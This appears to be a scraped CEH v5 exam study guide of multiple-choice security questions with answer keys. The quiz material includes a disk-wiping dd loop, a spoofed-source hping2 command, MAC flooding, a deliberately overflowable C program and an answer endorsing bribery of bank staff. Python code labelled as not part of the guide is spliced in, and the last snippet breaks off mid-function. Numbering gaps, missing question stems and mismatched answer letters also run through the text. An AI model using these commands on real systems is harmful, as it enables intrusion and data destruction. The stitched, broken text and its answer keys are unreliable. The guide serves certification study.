
CEH v5 Exam Study Guide


Page 1: CEH v5 Exam Study Guide

8/14/2019 CEH v5 Exam Study Guide

http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 1/90

Do not distribute this document

Prepared by Chan Tseng Loo, Beijing China

CEHv5 Sample Exam Questions

1. Which command in Linux produces IP address and MAC address output?

A. sudo nmap -sP 192.168.0.1/24
B. root nmap -sA 192.168.0.1/24
C. run nmap -TX 192.168.0.1/24
D. launch nmap -PP 192.168.0.1/24

Ans: a

2. What filter in Ethereal will you use to view Hotmail messages?

a. (http contains "hotmail") && (http contains "Reply-To")
b. (http contains "e-mail") && (http contains "hotmail")
c. (http = "login.passport.com") && (http contains "SMTP")
d. (http = "login.passport.com") && (http contains "POP3")

Ans: a

3. What does this command do?

for (( i = 0;i<11;i++ )); do
dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda
done

a. He is making a bit stream copy of the entire hard disk for later download
b. He is deleting log files to remove his trace
c. He is wiping the contents of the hard disk with zeros
d. He is infecting the hard disk with random virus strings

Ans: c

Page 2: CEH v5 Exam Study Guide

8/14/2019 CEH v5 Exam Study Guide

http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 2/90

4. How would you permanently wipe the data in the hard disk?

a. $ wipe -fik /dev/hda1
b. $ erase -fik /dev/hda1
c. $ delete -fik /dev/hda1
d. $ secdel -fik /dev/hda1

Ans: a

5. Which command scans for rootkits?

a. $ sudo chkrootkit
b. $ sudo avcheck
c. $ sudo runvirus
d. $ sudo rootvirus

Ans: a

6. 802.11a uses:

a. 5.15-5.825 GHz
b. 2.412-2.462 GHz
c. 2.323-2.462 GHz
d. 900 MHz-2.462 GHz

Ans: a

7. What command will you use in Google to view linked pages?

a. link:www.xsecurity.com
b. search?l:www.xsecurity.com
c. level1:www.xsecurity.com
d. pagerank:www.xsecurity.com

Ans: a


How do you stop web spidering?

a. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled
b. Place authentication on directories that will prevent crawling from these spiders
c. Enable SSL on the restricted directories which will block these spiders from crawling
d. Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index

Ans: a

12. What is the hexadecimal value of the NOP instruction?

a. 0x90
b. 0x80
c. 0x70
d. 0x60

Ans: a

13. When writing shellcode, you must avoid ____________ because these will end the string.

A. null bytes
B. root bytes
C. char bytes
D. Unicode bytes

Ans: a

14. Which of the following exclusive OR bit transforms is NOT correct?

A. 1 xor 1 = 1

B. 0 xor 0 = 0


C. 1 xor 0 = 1

D. 0 xor 1 = 1

Ans: a

15. How does polymorphic shellcode work?

a. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt the shellcode, and then executing the decrypted shellcode
b. They convert the shellcode into Unicode, using loader to convert back to machine code then executing them
c. They reverse the working instructions into opposite order by masking the IDS signatures
d. They compress shellcode into normal instructions, uncompress the shellcode using loader code and then executing the shellcode

Ans: a

16. In a buffer overflow exploit, which of the following registers gets overwritten with the return address of the exploit code?

a. EIP
b. ESP
c. EAP
d. EEP

Ans: a

17. Which type of scan does not open a full TCP connection?

a. Stealth Scan
b. XMAS Scan
c. Null Scan
d. FIN Scan

Ans: a


18. How do you prevent a hacker from launching FIN, NULL, and X-MAS scans on your network?

A. Modify the kernel to never send reset packets
B. Block TCP/IP packets with FIN flag enabled at the firewall
C. Enable IDS signatures to block these scans
D. You cannot block a hacker from launching these scans on your network

Ans: a

19. Which of the following encryption algorithms is not based on a block cipher?

a. DES
b. Blowfish
c. AES (Rijndael)
d. RC4

Ans: d

20. TCP/IP session hijacking is carried out in which OSI layer?

a. Transport layer
b. Datalink layer
c. Network layer
d. Physical layer

Ans: a

21.

SNMP is a connectionless protocol that uses UDP instead of TCP packets (True or False)

Ans: True


22. What defensive measures will you take to protect your network from password brute forcing attacks? (Select all that apply)

a. Never leave a default password.
b. Never use a password that can be found in a dictionary.
c. Never use a password related to the hostname, domain name, or anything else that can be found with whois.
d. Never use a password related to your hobbies, pets, relatives, or date of birth.
e. Use a word that has more than 21 characters from a dictionary as the password

Ans: a,b,c,d

23. An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for a reply. Unfortunately SNMP servers don't respond to requests with invalid community strings and the underlying protocol does not reliably report closed ports. This means that 'no response' from the probed IP address can mean which of the following: (Select 3 answers)

a. Machine unreachable
b. SNMP server not running
c. Invalid community string
d. S-AUTH protocol is running on the SNMP server

Ans: a,b,c

24. You want to retrieve the Cisco configuration from the router. How would you proceed? (Select 2 answers)

A. Send a customized SNMP set request with a spoofed source IP address in the range - 192.168.1.0
B. Run a network sniffer and capture the returned traffic with the configuration file from the router
C. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address
D. Use the Cisco's TFTP default password to connect and download the configuration file


Ans: a,b

25. How would you discover what telephone numbers to dial in to the router?

a. Search the Internet for leakage of target company's telephone number to dial-in
b. Run a war-dialing tool with range of phone numbers and look for CONNECT response
c. Connect using ISP's remote dial-in number since the company's router has a leased line connection established with them
d. Brute force the company's PABX system to retrieve the range of telephone numbers to dial-in

Ans: b

26. Hackers usually control bots through:

a. IRC Channel
b. MSN Messenger
c. Trojan client software
d. Yahoo Chat
e. GoogleTalk

Ans: a

27. How would you detect DNS reflectors on your network?

a. Run floodnet tool to detect these reflectors
b. Scan the network using Nmap for the services used by these reflectors
c. Look for the banner text by running Zombie Zapper tools
d. Run Vulnerability scanner on your network to detect these reflectors

Ans: b

28. What type of attack targets DNS servers for DoS?

a. DNS reflector and amplification attack
b. DNS cache poisoning attacks
c. DNS reverse connection attacks
d. DNS forward lookup attacks

Ans: a

29. ________ is a Cisco IOS mechanism that examines packets on Layers 4 to 7.

a. Network-Based Application Recognition (NBAR)
b. Denial of Service Filter (DOSF)
c. Rule Filter Application Protocol (RFAP)
d. Signature-Based Access List (SBAL)

Ans: a

30. What does the following command do?

CEH# hping2 -I eth0 -a 10.0.0.6 -s 1037 -p 22 --syn -c 1 -d 0xF00 --setseq 0x0000000f 192.168.0.9

a. This command will generate a single TCP SYN packet with source port 1037, destination port 22, with a sequence number 15 spoofing the IP address 10.0.0.6
b. This command will generate a single TCP UDP packet with source port 1037, destination port 15, with a sequence number 22 spoofing the IP address 192.168.0.9
c. This command will generate multiple TCP SYN/ACK packets with source port 22, destination port 1037, with a sequence number 19 spoofing the IP address 192.168.0.9
d. This command will generate multiple TCP SYN packets with source port 1037, destination port 22, with a sequence number 15 spoofing the IP address 10.0.0.6

Ans: a

31. Which of the following is an IDS-defeating technique?

a. IP Fragmentation or Session Splicing
b. IP Routing or Packet Dropping
c. IDS Spoofing or Session Assembly
d. IP Splicing or Packet Reassembly

Ans: a

32. How do you defend against SSL attacks?

a. Install a proxy server and terminate SSL at the proxy
b. Install a hardware SSL "accelerator" and terminate SSL at this layer
c. Enable the IDS to filter encrypted HTTPS traffic
d. Enable the Firewall to filter encrypted HTTPS traffic

Ans: a,b

33.

A digital signature is simply a message that is encrypted with the public key instead of the private key (True or False)

Ans: False

34. What are p and q in terms of PKI?

a. factorization
b. prime detection
c. hashing
d. brute-forcing

Ans: a

35. How do you block password brute forcing?

A. Enforce a password policy and use account lockouts after three wrong logon attempts even though this might lock out legit users
B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the Firewall manually
C. Enforce complex password policy on your network so that passwords are more difficult to brute force
D. You cannot completely block the intruder's attempts if they constantly switch proxies

Ans: d

36. What attacks can you successfully launch against a server using the SYN/ACK technique?

a. Session Hijacking attacks
b. Denial of Service attacks
c. Web page defacement attacks
d. IP spoofing attacks

Ans: a

37. How do you protect your network against SYN Flood attacks? (Select all that apply)

a. SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the client's IP address, port number, and other information. When the client responds with a normal ACK, that special sequence number will be included, which the server then verifies. Thus, the server first allocates memory on the third packet of the handshake, not the first
b. RST cookies - The server sends a wrong SYN/ACK back to the client. The client should then generate a RST packet telling the server that something is wrong. At this point, the server knows the client is valid and will now accept incoming connections from that client normally
c. Micro Blocks. Instead of allocating a complete connection, simply allocate a micro-record of 16 bytes for the incoming SYN object
d. Stack Tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN floods. Reduce the timeout before a stack frees up the memory allocated for a connection
e. Check the incoming packet's IP address with the SPAM database on the Internet and enable the filter using ACLs at the Firewall
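As an added example that is not part of the study guide, the Python below shows the SYN-cookie idea from option (a) end to end: the server derives the SYN-ACK sequence number from the client's IP and port, the server port, a coarse time counter and a server secret, and later reconstructs and verifies it from the client's final ACK without having stored any per-connection state. The secret, the MSS table and the 5-bit/3-bit/24-bit layout are assumptions modelled on the classic Linux scheme, not values from the page.

```python
import hashlib
import hmac
import ipaddress
import os

# Added example, not code from the study guide.  Server-side secret; a real
# stack rotates it (assumption: one random secret per process).
SECRET = os.urandom(16)

# MSS values a cookie can encode in its 3-bit field; the client's requested
# MSS is rounded down to the nearest entry (the table values are assumed).
MSS_TABLE = (536, 1220, 1440, 1460)

COUNTER_PERIOD = 60       # seconds per tick of the 5-bit time counter
MAX_COUNTER_AGE = 2       # cookies older than this many ticks are rejected


def _counter(now):
    """5-bit, minute-granularity counter that bounds how long a cookie is valid."""
    return int(now // COUNTER_PERIOD) & 0x1F


def _mac24(src_ip, src_port, dst_port, counter):
    """24-bit keyed hash over exactly the fields the final ACK lets us recover."""
    msg = (ipaddress.ip_address(src_ip).packed
           + src_port.to_bytes(2, "big")
           + dst_port.to_bytes(2, "big")
           + bytes([counter]))
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_syn_cookie(src_ip, src_port, dst_port, client_mss, now):
    """Sequence number for the SYN-ACK; no connection record is allocated.

    Layout (bits 31..0): 5-bit counter, 3-bit MSS index, 24-bit MAC."""
    mss_idx = 0
    for i, mss in enumerate(MSS_TABLE):
        if mss <= client_mss:
            mss_idx = i
    counter = _counter(now)
    return (counter << 27) | (mss_idx << 24) | _mac24(src_ip, src_port, dst_port, counter)


def verify_ack(src_ip, src_port, dst_port, ack_num, now):
    """Return the MSS encoded in a valid, fresh cookie, or None.

    The client's ACK number is our ISN + 1, so the cookie is ack_num - 1.
    Only when this succeeds (third packet of the handshake) does the server
    allocate state for the connection."""
    cookie = (ack_num - 1) & 0xFFFFFFFF
    counter = cookie >> 27
    mss_idx = (cookie >> 24) & 0x7
    mac = cookie & 0xFFFFFF
    age = (_counter(now) - counter) & 0x1F
    if age > MAX_COUNTER_AGE or mss_idx >= len(MSS_TABLE):
        return None
    expected = _mac24(src_ip, src_port, dst_port, counter)
    # Constant-time compare so a forger learns nothing from timing.
    if not hmac.compare_digest(expected.to_bytes(3, "big"), mac.to_bytes(3, "big")):
        return None
    return MSS_TABLE[mss_idx]


if __name__ == "__main__":
    # Constructed client 10.0.0.5:1037 connecting to our port 22.
    isn = make_syn_cookie("10.0.0.5", 1037, 22, 1460, now=1_000_000)
    print(hex(isn), verify_ack("10.0.0.5", 1037, 22, isn + 1, now=1_000_000))
    print(verify_ack("10.0.0.6", 1037, 22, isn + 1, now=1_000_000))  # spoofed source
```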


Which event log located at c:\windows\system32\config contains the trace of your brute force attempts?

a. AppEvent.Evt
b. SecEvent.Evt
c. SysEvent.Evt
d. WinEvent.Evt

Ans: b

42. If the password is 7 characters or less, then the second half of the LM hash is always:

a. 0xAAD3B435B51404EE
b. 0xAAD3B435B51404AA
c. 0xAAD3B435B51404BB
d. 0xAAD3B435B51404CC

Ans: a

43. How do you penetrate high security systems such as banks?

a. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information
b. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network
c. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots"
d. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

Ans: a

44. What is the "weakest link"?

1. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain
2. "Zero-day" exploits are the weakest link in the security chain since the IDS will not be able to detect these attacks
3. "Polymorphic viruses" are the weakest link in the security chain since the Anti-Virus scanners will not be able to detect these attacks
4. Continuous Spam e-mails cannot be blocked by your security system since spammers use different techniques to bypass the filters in your gateway.

Ans: a

45. What is the UK cybercrime law called?

a. Computer Misuse Act 1990
b. Computer Incident Act 2000
c. Cyber Crime Law Act 2003
d. Cyber Space Crime Act 1995

Ans: a

46. You can always defend yourself with the "ignorance of the law" clause. (True or False)

Ans: False

47. Which technique protects against password attacks?

a. Implement Biometrics based password authentication system. Record the customer's face image to the authentication database
b. Configure your firewall to block logon attempts of more than three wrong tries
c. Implement RSA SecurID based authentication system
d. Enable a complex password policy of 20 characters and ask the user to change the password immediately after they logon and do not store password histories

Ans: c


48. Every company needs this document:

a. Information Security Policy (ISP)
b. Information Audit Policy (IAP)
c. Penetration Testing Policy (PTP)
d. User Compliance Policy (UCP)

Ans: a

49. This is a patch management utility:

a. MBSA
b. BSSA
c. ASNB
d. PMUS

Ans: a

50. Windows is dangerously insecure when unpacked from the box, and there are a few things that you must do before you use it. (Select all that apply)

a. New installation of Windows should be patched by installing the latest service packs
b. Key applications such as Adobe Acrobat, Macromedia Flash, Java, Winzip etc. must have the latest security patches installed
c. Install a personal firewall and lock down unused ports from connecting to your computer
d. Install the latest signatures for Antivirus software
e. Configure "Windows Update" to automatic
f. Create a non-admin user with a complex password and logon to this account
g. You can start using your computer since the vendor such as DELL, HP and IBM already would have installed the latest service packs up-to-date

Ans: a,b,c,d


51. Which switch shows you the applications listening on ports?

1. netstat -anb -p tcp
2. netstat -an -p tcp -x
3. netstat -an -p tcp -c
4. netstat -an -p tcp -l

Ans: a

52. Test virus is created by:

a. Type the following code in Notepad and save the file as EICAR.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

b. Type the following code in Notepad and save the file as AVFILE.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.

X5O!P%@AP[4\PZX54(P^)7CC)7}$AVFILE-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

c. Type the following code in Notepad and save the file as TESTAV.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.

X5O!P%@AP[4\PZX54(P^)7CC)7}$TESTAV-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

d. Type the following code in Notepad and save the file as SAMPLEVIRUS.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.

X5O!P%@AP[4\PZX54(P^)7CC)7}$SAMPLEVIRUS-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Ans: a

53. Joke viruses are called:

1. Virus hoax
2. Spooky Virus
3. Stealth Virus
4. Polymorphic Virus

Ans: a

54. Act to prevent SPAM e-mails:

a. 2004 CANSPAM Act
b. 2003 SPAM Prevention Act
c. 2005 US-SPAM 1030 Act
d. 1990 Computer Misuse Act

Ans: a

55. Passwords are never cracked in these attacks:

a. Replay Attacks
b. Brute Force Attacks
c. Cryptography Attacks
d. John the Ripper Attacks

Ans: a

56. This is an authentication method used to prove that a party knows a password without transmitting the password in any recoverable form over a network. This authentication is secure because the password is never transmitted over the network, even in hashed form; only a random number and an encrypted random number are sent.

a. Challenge/Response Authentication
b. Basic Form Authentication
c. Realm Authentication
d. SSL Authentication
e. Cryptographic Authentication

Ans: a

57. Where are password files kept in Linux?

a. /etc/shadow
b. /etc/passwd
c. /bin/password
d. /bin/shadow

Ans: a

58. You are configuring the security options of your mail server and you would like to block certain file attachments to prevent viruses and malware from entering the users' inboxes. Which of the following file formats will you block? (Select all that apply)

a. .pif
b. .scr
c. .txt
d. .com
e. .exe
f. .rar
g. .vbs
h. .hta
i. .jpg

Ans: a,b,d,e,g,h

59. This tool floods the switch with bogus MAC addresses:

a. ./macof
b. ./sniffof
c. ./dsniff
d. ./switchsnarf


a. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
b. HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Start
c. HKEY_LOCAL_SYSTEM\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto
d. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Desktop

Ans: a

64. How would you keep users' home computers safe when they use the VPN?

a. Disable VPN access to all your employees from home machines
b. Allow VPN access but replace the standard authentication with biometric authentication
c. Replace the VPN access with dial-up modem access to the company's network
d. Enable 25 character complex password policy for employees to access the VPN network

Ans: a

65. Which programming language is NOT vulnerable to buffer overflow attacks?

a. Java
b. ActiveX
c. C++
d. Assembly Language

Ans: a

66. How do you secure the GET method in web page posts?

A. Replace the GET with POST method when sending data
B. Never include sensitive information in a script
C. Use HTTPS SSLv3 to send the data instead of plain HTTPS
D. Encrypt the data before you send using GET method

Ans: a

67. Two types of buffer overflow (BO):

a. Stack based buffer overflow
b. Active buffer overflow
c. Dynamic buffer overflow
d. Heap based buffer overflow

Ans: a,d

68. Which of the following lines in the C++ source code is vulnerable to buffer overflow exploits?

1. #include <stdio.h>

2. #include <stdlib.h>

3. #include <string.h>

4. #include <ctype.h>

5. #define MAXNAMELEN 50

6. #define MAXLINELEN 500

7. int FullFlag;

8. //Deletes the first word from a string

9. char *delfirstword(char *s)

10. {

11. char *sout = (char *)malloc(strlen(s));

12. int i = 0, i2 = 0;

13. if (s[0] == (char)NULL) return s;

14. while (isspace(s[i])) i++;

15. while ((!isspace(s[i])) && (s[i] != (char)NULL)) i++;

16. if (s[i] == (char)NULL) return "";

17. while ((isspace(s[i])) && (s[i] != (char)NULL)) i++;

18. while (s[i] != (char)NULL)

19. {

20. sout[i2] = s[i];

21. i++; i2++;

22. }

23. sout[i2] = (char)NULL;

24. return sout;

25. }

26. //Returns the soundex equivalent to In

27. char *Soundex(char *In)

28. {

29. int Iin, Iout;

30. char C, PrevDig, *Out = (char *)malloc(10);


31. if (FullFlag)

32. {Iin = 0; Iout = 0; PrevDig = '*';}

33. else

34. {Iin = 1; Iout = 1;

35. Out[0] = tolower(In[0]); PrevDig = Out[0];}

36. while ((In[Iin] != (char)NULL) && (Iout <= 4))

37. {

38. In[Iin] = tolower(In[Iin]);

39. switch (In[Iin])

40. {

41. case 'b' : C = '1'; break;

42. case 'p' : C = '1'; break;

43. case 'f' : C = '1'; break;

44. case 'v' : C = '1'; break;

45. case 'c' : C = '2'; break;

46. case 's' : C = '2'; break;

47. case 'k' : C = '2'; break;

48. case 'g' : C = '2'; break;

49. case 'j' : C = '2'; break;

50. case 'q' : C = '2'; break;

51. case 'x' : C = '2'; break;

52. case 'z' : C = '2'; break;

53. case 'd' : C = '3'; break;

54. case 't' : C = '3'; break;

55. case 'l' : C = '4'; break;

56. case 'm' : C = '5'; break;

57. case 'n' : C = '5'; break;

58. case 'r' : C = '6'; break;

59. default : C = '*';

60. }

61. if ((C != PrevDig) && (C != '*'))

62. {

63. Out[Iout] = C;

64. PrevDig = Out[Iout];

65. Iout++;

66. }

67. Iin++;

68. }

69. if (Iout < 4)

70. for (Iin=Iout; Iin<4; Iin++)

71. Out[Iin] = '0';

72. Out[4] = NULL;

73. return Out;

74. }

75. //Main function

76. int main(int argc, char *argv[])

77. {

78. char *Name = (char *)malloc(MAXNAMELEN), *Line = (char*)malloc(MAXLINELEN);

79. int I;

80. FullFlag = 0;

81. if (argc >= 2)

82. {

83. if (!strcmp(argv[1], "-f"))

84. FullFlag = 1;

85. if ((!strcmp(argv[1], "-h")) || (!strcmp(argv[1], "-?")) ||

86. (!strcmp(argv[1], "?")))


87. {

88. printf("Usage: soundex [-f] <name1> <name2> ...\n\n");

89. printf("-f treats the first character of name just like the others.\n");

90. printf("If no names are specified in the arguments, soundex will read\n");

91. printf("from the standard input until end of file is encountered.\n");

92. printf("Note that names of two characters or less are disregarded.\n");

93. }

94. }

95. if (FullFlag && (argc >= 3))

96. {

97. for (I=2; I<=(argc-1); I++)

98. if (strlen(argv[I]) >= 3)

99. printf("%s ", Soundex(argv[I]));

100. printf("\n");

101. return 0;

102. }

103. if ((!FullFlag) && (argc >= 2))

104. {

105. for (I=1; I<=(argc-1); I++)

106. if (strlen(argv[I]) >= 3)

107. printf("%s ", Soundex(argv[I]));

108. printf("\n");

109. return 0;

110. }

111. while (gets(Line) != NULL)

112. {

113. while (strcmp(Line, ""))

114. {

115. sscanf(Line, "%s", Name);

116. if (strlen(Name) >= 3)

117. printf("%s ", Soundex(Name));

118. strcpy(Line, delfirstword(Line));

119. }

120. printf ("\n");

121. }

122. free(Line); free(Name);

123. return 0;

124. }

Type the line number here: 118

69. Which of the following built-in C/C++ functions should you avoid to protect your program from buffer overflow attacks? (Select 3 answers)

a. strcpy()
b. strcat()
c. streadd()
d. strlength()

Ans: a,b,c

70. What is the countermeasure against XSS scripting?

1. Create an IP access list and restrict connections based on port number
2. Replace "<" and ">" characters with "&lt;" and "&gt;" using server scripts
3. Disable Javascript in IE and Firefox browsers
4. Connect to the server using HTTPS protocol instead of HTTP

Ans: b

71. Microsoft Authenticode technology is used for:

a. Digitally signing ActiveX controls
b. Digitally signing SSL certificates
c. Digitally signing Javascript files
d. Digitally signing Java Applets

Ans: a

72. Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. (True or False)

Ans: True

73. How do you defend against ARP Spoofing? (Select 3 answers)

a. Place static ARP entries on servers, workstations and routers
b. Tune IDS Sensors to look for large amount of ARP traffic on local subnets
c. Use private VLANS
d. Use ARPWALL system and block ARP spoofing attacks

Ans: a,b,c

74. You are trying to hijack a telnet session from a victim machine with IP address 10.0.0.5 to Cisco router at 10.0.0.1. You sniff the traffic and attempt to predict the sequence and acknowledgement numbers to successfully hijack the telnet session.

Here is the captured data in tcpdump.

Victim Machine (10.0.0.5)                              Router (10.0.0.1)

SYN   Seq.no. 17768656 (next seq.no. 17768657)  -------->
      Ack.no. 0, Window 8192, LEN = 0 bytes

      <--------  SYN-ACK  Seq.no. 82980009 (next seq.no. 82980010)
                          Ack.no. 17768657, Window 8760, LEN = 0 bytes

ACK   Seq.no. 17768657 (next seq.no. 17768657)  -------->
      Ack.no. 82980010, Window 8760, LEN = 0 bytes

      Seq.no. 17768657 (next seq.no. 17768729)  -------->
      Ack.no. 82980010, Window 8760, LEN = 72 bytes of data

      <--------  Seq.no. 82980010 (next seq.no. 82980070)
                 Ack.no. 17768729, Window 8688, LEN = 60 bytes of data

      Seq.no. 17768729 (next seq.no. 17768885)  -------->
      Ack.no. 82980070, Window 8700, LEN = 156 bytes of data

      <--------  Seq.no. ????????
                 Ack.no. ????????
                 Window 8532, LEN = 152 bytes of data

What are the next sequence and acknowledgement numbers that the router will send to the victim machine?

a. Sequence number: 82980070 Acknowledgement number: 17768885
b. Sequence number: 17768729 Acknowledgement number: 82980070
c. Sequence number: 87000070 Acknowledgement number: 85320085
d. Sequence number: 82980010 Acknowledgement number: 17768885

Ans: a
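As an added example that is not part of the study guide, the Python below replays the capture above as data and applies the two rules behind the answer: a sender's next sequence number advances by the bytes it sent (plus one for a SYN or FIN), and its acknowledgement number is the next byte it expects from the peer. The same arithmetic lets an IDS judge whether a segment is in sequence, which is how injected segments stand out; all constants come from the capture.

```python
# Added example, not code from the study guide: the captured telnet exchange
# above, replayed as data so the router's next segment can be computed.

VICTIM = "10.0.0.5"
ROUTER = "10.0.0.1"

# Initial sequence numbers taken from the SYN and SYN-ACK in the capture.
ISN = {VICTIM: 17768656, ROUTER: 82980009}

# (sender, flags, payload length) in capture order; seq/ack are derived.
CAPTURE = [
    (VICTIM, {"SYN"}, 0),
    (ROUTER, {"SYN", "ACK"}, 0),
    (VICTIM, {"ACK"}, 0),
    (VICTIM, {"ACK"}, 72),
    (ROUTER, {"ACK"}, 60),
    (VICTIM, {"ACK"}, 156),
]


def replay(capture, isn):
    """Walk the segments, returning [(sender, seq, ack)] plus the end state.

    next_seq[x] is the next byte x will send; expected[x] is the next byte x
    expects from its peer, i.e. the ack number x puts on its next segment."""
    next_seq = dict(isn)
    expected = {side: 0 for side in isn}
    segments = []
    for sender, flags, length in capture:
        peer = ROUTER if sender == VICTIM else VICTIM
        seq, ack = next_seq[sender], expected[sender]
        segments.append((sender, seq, ack))
        # SYN and FIN each consume one sequence number; data consumes its length.
        consumed = length + ("SYN" in flags) + ("FIN" in flags)
        next_seq[sender] = (seq + consumed) & 0xFFFFFFFF
        expected[peer] = next_seq[sender]
    return segments, next_seq, expected


def predict_next(sender, capture=CAPTURE, isn=ISN):
    """(seq, ack) of the next segment `sender` will emit after the capture."""
    _, next_seq, expected = replay(capture, isn)
    return next_seq[sender], expected[sender]


def in_sequence(sender, seq, capture=CAPTURE, isn=ISN):
    """True if a segment claiming `seq` from `sender` is the one the peer expects.
    An IDS applies this check to flag injected, out-of-sequence segments."""
    return seq == predict_next(sender, capture, isn)[0]


if __name__ == "__main__":
    for sender, seq, ack in replay(CAPTURE, ISN)[0]:
        print(f"{sender:9} seq={seq} ack={ack}")
    print("router next:", predict_next(ROUTER))  # (82980070, 17768885)
```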

75. FIN Scanning does not correctly work on which of the following machines?

a. Windows machines
b. Linux machines
c. Sun Solaris machines
d. WiFi Devices

Ans: a

76. This scanning technique sends the probe packet, splitting up the TCP header over several packets to make it harder for packet filters to detect what is happening.

a. SYN Scanning
b. XMAS Scanning
c. Fragmentation Scanning
d. Stealth Scanning

Ans: c

77. What is the term used for serving different types of web pages based on the user's IP address?

1. Website Cloaking
2. Website Filtering
3. IP Access Blockade
4. Mirroring Website

Ans: a

1. Dan is conducting a pen-test and has found a vulnerability in a Web App which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well. Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session?

a. The server will send replies back to the spoofed IP address and hence interactivity would be difficult*
b. Dan cannot spoof his IP address over TCP network
c. The scenario is incorrect as Dan can spoof his IP and get responses
d. Dan can establish an interactive session only if he uses a NAT

2. Clive is conducting a pen-test and has just port scanned a system on the network. He has identified the operating system as Linux and been able to elicit responses from ports 23, 25 and 53. He infers port 23 as running Telnet service, port 25 as running SMTP service and port 53 as running DNS service. The client confirms these findings and attests to the current availability of the services.

When he tries to telnet to port 23 or 25, he gets a blank screen in response. On typing other commands, he sees only blank spaces or underscore symbols on the screen. What are you most likely to infer from this?

a. This indicates that the telnet and SMTP server have crashed
b. There is a honeypot running on the scanned machine
c. The services are protected by TCP wrappers*
d. An attacker has replaced the services with trojaned ones

3. Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replay the cookie even while the session is valid on the server. Why do you think this is possible?

a. It works because any encryption is performed at the application layer (single encryption key)*
b. The scenario is invalid as a secure cookie cannot be replayed
c. It works because any encryption is performed at the network layer (layer 1 encryption)
d. Any cookie can be replayed irrespective of the session status

4. Study the snort rule given below and interpret the rule. Choose the correct option.

alert tcp any any -> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msg: "mountd access";)

a. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111
b. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on port 111*
c. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet
d. An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet

5. What is the command used to create a binary log file using tcpdump?

a. tcpdump -w ./log*
b. tcpdump -r log
c. tcpdump -vde -r log
d. tcpdump -l /var/log/

6. What scan type produced the following tcpdump output?

tcpdump -vv -x host 192.168.1.10
17:35:06.731739 eth0 < 192.168.1.10 > victim: ip-proto-130 0 (ttl 59, id 42060)
4500 0014 a44c 0000 3b82 57b8 c0a8 010a
c0a8 0109 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000

a. nmap -sO -T 192.168.1.10*
b. nmap -sS 192.168.1.10
c. nmap -sV 192.168.1.10
d. nmap -sR 192.168.1.10

The giveaway is ip-proto-130 with a 20-byte datagram and no payload: a protocol scan (-sO) sends a bare IP header for each protocol number (only TCP, UDP and ICMP probes carry a proper payload) and classifies the protocol from the ICMP protocol-unreachable replies, or their absence.
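As an added example (not part of the study guide), this parser decodes the hex dump above into its IPv4 header fields and verifies the header checksum, which is how you confirm that a dump line like this is an intact, empty protocol probe rather than a truncated capture. The protocol-probe heuristic at the end is this example's own rule of thumb, not anything nmap or tcpdump documents.

```python
import struct

# Constructed copy of the hex dump from the tcpdump -x output in the question.
HEXDUMP = """
4500 0014 a44c 0000 3b82 57b8 c0a8 010a
c0a8 0109 0000 0000 0000 0000 0000 0000
0000 0000 0000 0000 0000 0000 0000
"""


def hexdump_to_bytes(dump):
    return bytes.fromhex(''.join(dump.split()))


def ip_checksum(data):
    """RFC 1071 one's-complement checksum. Over a header that includes its
    own checksum field the result is 0 when the header is intact."""
    if len(data) % 2:
        data += b'\x00'
    total = sum(struct.unpack('!%dH' % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xffff) + (total >> 16)
    return ~total & 0xffff


def parse_ipv4(raw):
    """Decode the fixed 20-byte IPv4 header at the start of raw."""
    (ver_ihl, tos, total_len, ident, flags_frag, ttl, proto,
     csum, src, dst) = struct.unpack('!BBHHHBBH4s4s', raw[:20])
    ihl = (ver_ihl & 0x0f) * 4
    return {
        'version': ver_ihl >> 4,
        'ihl': ihl,
        'total_length': total_len,
        'id': ident,
        'dont_fragment': bool(flags_frag & 0x4000),
        'ttl': ttl,
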